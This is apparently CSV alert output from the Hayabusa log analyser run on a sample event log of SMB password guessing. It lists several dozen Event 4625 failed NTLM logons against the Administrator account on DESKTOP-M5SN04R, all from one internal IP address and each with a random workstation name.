2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
